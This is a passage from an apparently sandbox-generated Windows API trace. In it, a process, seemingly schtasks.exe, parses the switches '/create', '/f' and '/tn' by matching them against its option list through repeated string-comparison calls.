[0169.593] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.593] lstrlenW (lpString="k") returned 1
[0169.593] GetThreadLocale () returned 0x409
[0169.593] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.593] lstrlenW (lpString="du") returned 2
[0169.593] GetThreadLocale () returned 0x409
[0169.593] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.593] lstrlenW (lpString="ri") returned 2
[0169.593] GetThreadLocale () returned 0x409
[0169.593] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.593] lstrlenW (lpString="z") returned 1
[0169.593] GetThreadLocale () returned 0x409
[0169.593] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.593] lstrlenW (lpString="f") returned 1
[0169.593] GetThreadLocale () returned 0x409
[0169.594] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.594] lstrlenW (lpString="v1") returned 2
[0169.594] GetThreadLocale () returned 0x409
[0169.594] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.594] lstrlenW (lpString="xml") returned 3
[0169.594] GetThreadLocale () returned 0x409
[0169.594] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.594] lstrlenW (lpString="ec") returned 2
[0169.594] GetThreadLocale () returned 0x409
[0169.594] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.594] lstrlenW (lpString="rl") returned 2
[0169.594] GetThreadLocale () returned 0x409
[0169.594] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.594] lstrlenW (lpString="delay") returned 5
[0169.594] GetThreadLocale () returned 0x409
[0169.594] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.594] lstrlenW (lpString="np") returned 2
[0169.594] SetLastError (dwErrCode=0x0)
[0169.594] SetLastError (dwErrCode=0x0)
[0169.594] lstrlenW (lpString="/create") returned 7
[0169.594] lstrlenW (lpString="-/") returned 2
[0169.594] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0169.594] lstrlenW (lpString="create") returned 6
[0169.594] lstrlenW (lpString="create") returned 6
[0169.594] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.594] lstrlenW (lpString="create") returned 6
[0169.595] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.595] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x9, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|create|") returned 8
[0169.595] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|create|") returned 8
[0169.595] lstrlenW (lpString="|create|") returned 8
[0169.595] lstrlenW (lpString="|create|") returned 8
[0169.595] StrStrIW (lpFirst="|create|", lpSrch="|create|") returned="|create|"
[0169.595] SetLastError (dwErrCode=0x0)
[0169.595] SetLastError (dwErrCode=0x0)
[0169.595] SetLastError (dwErrCode=0x0)
[0169.595] lstrlenW (lpString="/f") returned 2
[0169.595] lstrlenW (lpString="-/") returned 2
[0169.595] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0169.595] lstrlenW (lpString="create") returned 6
[0169.595] lstrlenW (lpString="create") returned 6
[0169.595] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.596] lstrlenW (lpString="f") returned 1
[0169.596] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.596] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x9, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|create|") returned 8
[0169.596] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.596] lstrlenW (lpString="|create|") returned 8
[0169.596] lstrlenW (lpString="|f|") returned 3
[0169.596] StrStrIW (lpFirst="|create|", lpSrch="|f|") returned 0x0
[0169.596] SetLastError (dwErrCode=0x490)
[0169.596] lstrlenW (lpString="?") returned 1
[0169.596] lstrlenW (lpString="?") returned 1
[0169.596] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.596] lstrlenW (lpString="f") returned 1
[0169.596] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.596] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|?|") returned 3
[0169.596] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.596] lstrlenW (lpString="|?|") returned 3
[0169.596] lstrlenW (lpString="|f|") returned 3
[0169.596] StrStrIW (lpFirst="|?|", lpSrch="|f|") returned 0x0
[0169.596] SetLastError (dwErrCode=0x490)
[0169.596] lstrlenW (lpString="s") returned 1
[0169.596] lstrlenW (lpString="s") returned 1
[0169.596] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.597] lstrlenW (lpString="f") returned 1
[0169.597] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.597] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|s|") returned 3
[0169.597] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.597] lstrlenW (lpString="|s|") returned 3
[0169.597] lstrlenW (lpString="|f|") returned 3
[0169.597] StrStrIW (lpFirst="|s|", lpSrch="|f|") returned 0x0
[0169.597] SetLastError (dwErrCode=0x490)
[0169.597] lstrlenW (lpString="u") returned 1
[0169.597] lstrlenW (lpString="u") returned 1
[0169.597] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.597] lstrlenW (lpString="f") returned 1
[0169.597] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.597] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|u|") returned 3
[0169.597] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.597] lstrlenW (lpString="|u|") returned 3
[0169.597] lstrlenW (lpString="|f|") returned 3
[0169.597] StrStrIW (lpFirst="|u|", lpSrch="|f|") returned 0x0
[0169.597] SetLastError (dwErrCode=0x490)
[0169.597] lstrlenW (lpString="p") returned 1
[0169.597] lstrlenW (lpString="p") returned 1
[0169.597] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.597] lstrlenW (lpString="f") returned 1
[0169.598] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.598] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|p|") returned 3
[0169.598] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.598] lstrlenW (lpString="|p|") returned 3
[0169.598] lstrlenW (lpString="|f|") returned 3
[0169.598] StrStrIW (lpFirst="|p|", lpSrch="|f|") returned 0x0
[0169.598] SetLastError (dwErrCode=0x490)
[0169.598] lstrlenW (lpString="ru") returned 2
[0169.598] lstrlenW (lpString="ru") returned 2
[0169.598] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.598] lstrlenW (lpString="f") returned 1
[0169.598] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.598] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|ru|") returned 4
[0169.598] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.598] lstrlenW (lpString="|ru|") returned 4
[0169.598] lstrlenW (lpString="|f|") returned 3
[0169.598] StrStrIW (lpFirst="|ru|", lpSrch="|f|") returned 0x0
[0169.598] SetLastError (dwErrCode=0x490)
[0169.598] lstrlenW (lpString="rp") returned 2
[0169.598] lstrlenW (lpString="rp") returned 2
[0169.598] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.598] lstrlenW (lpString="f") returned 1
[0169.598] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.599] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|rp|") returned 4
[0169.599] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.599] lstrlenW (lpString="|rp|") returned 4
[0169.599] lstrlenW (lpString="|f|") returned 3
[0169.599] StrStrIW (lpFirst="|rp|", lpSrch="|f|") returned 0x0
[0169.599] SetLastError (dwErrCode=0x490)
[0169.599] lstrlenW (lpString="sc") returned 2
[0169.599] lstrlenW (lpString="sc") returned 2
[0169.599] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.599] lstrlenW (lpString="f") returned 1
[0169.599] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.599] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|sc|") returned 4
[0169.599] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.599] lstrlenW (lpString="|sc|") returned 4
[0169.599] lstrlenW (lpString="|f|") returned 3
[0169.599] StrStrIW (lpFirst="|sc|", lpSrch="|f|") returned 0x0
[0169.599] SetLastError (dwErrCode=0x490)
[0169.599] lstrlenW (lpString="mo") returned 2
[0169.599] lstrlenW (lpString="mo") returned 2
[0169.599] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.599] lstrlenW (lpString="f") returned 1
[0169.599] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.599] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|mo|") returned 4
[0169.600] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.600] lstrlenW (lpString="|mo|") returned 4
[0169.600] lstrlenW (lpString="|f|") returned 3
[0169.600] StrStrIW (lpFirst="|mo|", lpSrch="|f|") returned 0x0
[0169.600] SetLastError (dwErrCode=0x490)
[0169.600] lstrlenW (lpString="d") returned 1
[0169.600] lstrlenW (lpString="d") returned 1
[0169.600] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.600] lstrlenW (lpString="f") returned 1
[0169.600] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.600] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|d|") returned 3
[0169.600] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.600] lstrlenW (lpString="|d|") returned 3
[0169.600] lstrlenW (lpString="|f|") returned 3
[0169.600] StrStrIW (lpFirst="|d|", lpSrch="|f|") returned 0x0
[0169.600] SetLastError (dwErrCode=0x490)
[0169.600] lstrlenW (lpString="m") returned 1
[0169.600] lstrlenW (lpString="m") returned 1
[0169.600] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.601] lstrlenW (lpString="f") returned 1
[0169.601] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.601] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|m|") returned 3
[0169.601] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.601] lstrlenW (lpString="|m|") returned 3
[0169.601] lstrlenW (lpString="|f|") returned 3
[0169.601] StrStrIW (lpFirst="|m|", lpSrch="|f|") returned 0x0
[0169.601] SetLastError (dwErrCode=0x490)
[0169.601] lstrlenW (lpString="i") returned 1
[0169.601] lstrlenW (lpString="i") returned 1
[0169.601] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.601] lstrlenW (lpString="f") returned 1
[0169.601] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.601] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|i|") returned 3
[0169.601] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.601] lstrlenW (lpString="|i|") returned 3
[0169.601] lstrlenW (lpString="|f|") returned 3
[0169.601] StrStrIW (lpFirst="|i|", lpSrch="|f|") returned 0x0
[0169.601] SetLastError (dwErrCode=0x490)
[0169.601] lstrlenW (lpString="tn") returned 2
[0169.601] lstrlenW (lpString="tn") returned 2
[0169.602] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.602] lstrlenW (lpString="f") returned 1
[0169.602] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.602] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|tn|") returned 4
[0169.602] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.602] lstrlenW (lpString="|tn|") returned 4
[0169.602] lstrlenW (lpString="|f|") returned 3
[0169.602] StrStrIW (lpFirst="|tn|", lpSrch="|f|") returned 0x0
[0169.602] SetLastError (dwErrCode=0x490)
[0169.602] lstrlenW (lpString="tr") returned 2
[0169.602] lstrlenW (lpString="tr") returned 2
[0169.602] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.602] lstrlenW (lpString="f") returned 1
[0169.602] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.602] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|tr|") returned 4
[0169.602] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.602] lstrlenW (lpString="|tr|") returned 4
[0169.602] lstrlenW (lpString="|f|") returned 3
[0169.602] StrStrIW (lpFirst="|tr|", lpSrch="|f|") returned 0x0
[0169.602] SetLastError (dwErrCode=0x490)
[0169.602] lstrlenW (lpString="st") returned 2
[0169.602] lstrlenW (lpString="st") returned 2
[0169.602] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.603] lstrlenW (lpString="f") returned 1
[0169.603] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.603] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|st|") returned 4
[0169.603] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.603] lstrlenW (lpString="|st|") returned 4
[0169.603] lstrlenW (lpString="|f|") returned 3
[0169.603] StrStrIW (lpFirst="|st|", lpSrch="|f|") returned 0x0
[0169.603] SetLastError (dwErrCode=0x490)
[0169.603] lstrlenW (lpString="sd") returned 2
[0169.603] lstrlenW (lpString="sd") returned 2
[0169.603] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.603] lstrlenW (lpString="f") returned 1
[0169.603] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.603] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|sd|") returned 4
[0169.603] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.603] lstrlenW (lpString="|sd|") returned 4
[0169.603] lstrlenW (lpString="|f|") returned 3
[0169.603] StrStrIW (lpFirst="|sd|", lpSrch="|f|") returned 0x0
[0169.603] SetLastError (dwErrCode=0x490)
[0169.603] lstrlenW (lpString="ed") returned 2
[0169.603] lstrlenW (lpString="ed") returned 2
[0169.603] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.603] lstrlenW (lpString="f") returned 1
[0169.603] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.603] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|ed|") returned 4
[0169.604] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.604] lstrlenW (lpString="|ed|") returned 4
[0169.604] lstrlenW (lpString="|f|") returned 3
[0169.604] StrStrIW (lpFirst="|ed|", lpSrch="|f|") returned 0x0
[0169.604] SetLastError (dwErrCode=0x490)
[0169.604] lstrlenW (lpString="it") returned 2
[0169.604] lstrlenW (lpString="it") returned 2
[0169.604] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.604] lstrlenW (lpString="f") returned 1
[0169.604] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.604] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|it|") returned 4
[0169.604] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.604] lstrlenW (lpString="|it|") returned 4
[0169.604] lstrlenW (lpString="|f|") returned 3
[0169.604] StrStrIW (lpFirst="|it|", lpSrch="|f|") returned 0x0
[0169.604] SetLastError (dwErrCode=0x490)
[0169.604] lstrlenW (lpString="et") returned 2
[0169.604] lstrlenW (lpString="et") returned 2
[0169.604] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.604] lstrlenW (lpString="f") returned 1
[0169.604] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.604] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|et|") returned 4
[0169.605] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.605] lstrlenW (lpString="|et|") returned 4
[0169.605] lstrlenW (lpString="|f|") returned 3
[0169.605] StrStrIW (lpFirst="|et|", lpSrch="|f|") returned 0x0
[0169.605] SetLastError (dwErrCode=0x490)
[0169.605] lstrlenW (lpString="k") returned 1
[0169.605] lstrlenW (lpString="k") returned 1
[0169.605] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.605] lstrlenW (lpString="f") returned 1
[0169.605] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.605] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|k|") returned 3
[0169.605] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.605] lstrlenW (lpString="|k|") returned 3
[0169.605] lstrlenW (lpString="|f|") returned 3
[0169.605] StrStrIW (lpFirst="|k|", lpSrch="|f|") returned 0x0
[0169.605] SetLastError (dwErrCode=0x490)
[0169.605] lstrlenW (lpString="du") returned 2
[0169.605] lstrlenW (lpString="du") returned 2
[0169.605] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.605] lstrlenW (lpString="f") returned 1
[0169.605] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.605] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|du|") returned 4
[0169.605] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.605] lstrlenW (lpString="|du|") returned 4
[0169.605] lstrlenW (lpString="|f|") returned 3
[0169.605] StrStrIW (lpFirst="|du|", lpSrch="|f|") returned 0x0
[0169.606] SetLastError (dwErrCode=0x490)
[0169.606] lstrlenW (lpString="ri") returned 2
[0169.606] lstrlenW (lpString="ri") returned 2
[0169.606] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.606] lstrlenW (lpString="f") returned 1
[0169.606] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.606] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|ri|") returned 4
[0169.606] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.606] lstrlenW (lpString="|ri|") returned 4
[0169.606] lstrlenW (lpString="|f|") returned 3
[0169.606] StrStrIW (lpFirst="|ri|", lpSrch="|f|") returned 0x0
[0169.606] SetLastError (dwErrCode=0x490)
[0169.606] lstrlenW (lpString="z") returned 1
[0169.606] lstrlenW (lpString="z") returned 1
[0169.606] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.606] lstrlenW (lpString="f") returned 1
[0169.606] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.606] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|z|") returned 3
[0169.606] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.606] lstrlenW (lpString="|z|") returned 3
[0169.606] lstrlenW (lpString="|f|") returned 3
[0169.606] StrStrIW (lpFirst="|z|", lpSrch="|f|") returned 0x0
[0169.606] SetLastError (dwErrCode=0x490)
[0169.606] lstrlenW (lpString="f") returned 1
[0169.606] lstrlenW (lpString="f") returned 1
[0169.606] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.607] lstrlenW (lpString="f") returned 1
[0169.607] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.607] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.607] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.607] lstrlenW (lpString="|f|") returned 3
[0169.607] lstrlenW (lpString="|f|") returned 3
[0169.607] StrStrIW (lpFirst="|f|", lpSrch="|f|") returned="|f|"
[0169.607] SetLastError (dwErrCode=0x0)
[0169.607] SetLastError (dwErrCode=0x0)
[0169.607] SetLastError (dwErrCode=0x0)
[0169.607] lstrlenW (lpString="/tn") returned 3
[0169.607] lstrlenW (lpString="-/") returned 2
[0169.607] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0169.607] lstrlenW (lpString="create") returned 6
[0169.607] lstrlenW (lpString="create") returned 6
[0169.607] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.607] lstrlenW (lpString="tn") returned 2
[0169.607] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.607] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x9, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|create|") returned 8
[0169.607] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|tn|") returned 4
[0169.607] lstrlenW (lpString="|create|") returned 8
[0169.607] lstrlenW (lpString="|tn|") returned 4
[0169.607] StrStrIW (lpFirst="|create|", lpSrch="|tn|") returned 0x0
[0169.607] SetLastError (dwErrCode=0x490)
[0169.607] lstrlenW (lpString="?") returned 1
[0169.607] lstrlenW (lpString="?") returned 1
[0169.608] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.608] lstrlenW (lpString="tn") returned 2
[0169.608] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.608] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|?|") returned 3
[0169.608] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|tn|") returned 4
[0169.608] lstrlenW (lpString="|?|") returned 3
[0169.608] lstrlenW (lpString="|tn|") returned 4
[0169.608] SetLastError (dwErrCode=0x490)
[0169.608] lstrlenW (lpString="s") returned 1
[0169.608] lstrlenW (lpString="s") returned 1
[0169.608] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.608] lstrlenW (lpString="tn") returned 2
[0169.608] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.608] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|s|") returned 3
[0169.608] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|tn|") returned 4
[0169.608] lstrlenW (lpString="|s|") returned 3
[0169.608] lstrlenW (lpString="|tn|") returned 4
[0169.608] SetLastError (dwErrCode=0x490)
[0169.608] lstrlenW (lpString="u") returned 1
[0169.608] lstrlenW (lpString="u") returned 1
[0169.608] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.608] lstrlenW (lpString="tn") returned 2
[0169.608] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.608] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|u|") returned 3
[0169.609] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|tn|") returned 4
[0169.609] lstrlenW (lpString="|u|") returned 3
[0169.609] lstrlenW (lpString="|tn|") returned 4
[0169.609] SetLastError (dwErrCode=0x490)
[0169.609] lstrlenW (lpString="p") returned 1
[0169.609] lstrlenW (lpString="p") returned 1
[0169.609] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.609] lstrlenW (lpString="tn") returned 2
